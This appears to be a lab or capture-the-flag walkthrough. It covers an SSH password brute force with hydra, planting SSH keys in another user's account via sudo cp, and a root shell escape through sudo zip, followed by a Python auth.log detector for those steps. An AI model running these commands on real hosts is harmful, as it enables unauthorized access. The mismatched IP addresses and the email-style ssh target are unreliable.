We start by scanning the host with nmap -A -T4 -p- 192.168.1.10 -vv
The web page on the host is full of text in English and in another language, so let's use cewl to harvest these words into a wordlist.
Copy the text to a file and remove the entries you don't want; there are a lot of words, and we only need them as a username file to brute-force the SSH service on port 65345.
hydra -L users.txt -P users.txt ssh://188.8.131.52:65345
Now let's log in using the username pinak and the password Gandiv.
Running sudo -l returned a message.
In the home directory of the user sarang there is a .ssh folder, but trying to copy it gives us permission denied. So we generate our own SSH key pair, copy the public key into sarang's .ssh folder as the user sarang, and then SSH in as sarang to get access to their account.
cat /home/pinak/.ssh/id_rsa.pub > /home/pinak/authorized_keys
sudo -u sarang /bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys
ssh firstname.lastname@example.org -p 65345
sudo /usr/bin/zip test.zip test -T --unzip-command="sh -c /bin/bash"
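From the defender's side, the three steps above (password guessing against SSH, planting an authorized_keys file in another user's home via sudo cp, and escaping to a shell through sudo zip with --unzip-command) all leave traces in auth.log. The following is an added example, not part of the original write-up; the log lines are constructed to mirror those steps and the regexes assume standard sshd/sudo syslog formatting.

```python
import re
from collections import Counter

# Constructed sample auth.log lines (not taken from the write-up) modelled on
# the SSH guessing burst and the two sudo steps the walkthrough performs.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 host sshd[2001]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2
Jan 10 12:00:02 host sshd[2002]: Failed password for pinak from 10.0.0.5 port 40002 ssh2
Jan 10 12:00:03 host sshd[2003]: Failed password for pinak from 10.0.0.5 port 40003 ssh2
Jan 10 12:00:04 host sshd[2004]: Accepted password for pinak from 10.0.0.5 port 40004 ssh2
Jan 10 12:01:10 host sudo:    pinak : TTY=pts/0 ; PWD=/home/pinak ; USER=sarang ; COMMAND=/bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys
Jan 10 12:02:30 host sudo:   sarang : TTY=pts/1 ; PWD=/home/sarang ; USER=root ; COMMAND=/usr/bin/zip test.zip test -T --unzip-command=sh -c /bin/bash
Jan 10 12:03:00 host sudo:   sarang : TTY=pts/1 ; PWD=/home/sarang ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<who>\S+) : .*?USER=(?P<as>\S+) ; COMMAND=(?P<cmd>.*)$")
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?\S+ from (?P<ip>\S+)")
# cp whose destination is an authorized_keys file inside some user's home
AUTHKEYS_RE = re.compile(r"^/(?:usr/)?bin/cp .* (?P<dst>/home/(?P<owner>[^/]+)/\.ssh/authorized_keys)")

def suspicious_sudo(line):
    """Return a reason if a sudo log line matches one of the two escalation patterns, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    who, target, cmd = m["who"], m["as"], m["cmd"]
    if cmd.startswith("/usr/bin/zip") and "--unzip-command" in cmd:
        return f"{who} ran zip with --unzip-command as {target} (spawns a shell)"
    k = AUTHKEYS_RE.match(cmd)
    if k and k["owner"] != who:  # writing someone else's authorized_keys
        return f"{who} wrote {k['dst']} via sudo as {target} (SSH key planting)"
    return None

def analyse(log_text, fail_threshold=3):
    """Scan auth.log text; return alert strings for sudo abuse and password-guessing bursts."""
    alerts, failures = [], Counter()
    for line in log_text.splitlines():
        f = FAILED_RE.search(line)
        if f:
            failures[f["ip"]] += 1
            continue
        reason = suspicious_sudo(line)
        if reason:
            alerts.append(reason)
    for ip, n in failures.items():
        if n >= fail_threshold:
            alerts.append(f"{n} failed SSH logins from {ip} (possible password guessing)")
    return alerts
```

Running `analyse(SAMPLE_AUTH_LOG)` yields one alert for each of the three steps and none for the benign apt run; in practice the same checks map onto sudoers review (auditing which users may run cp or zip as another user) and rate-based SSH alerting.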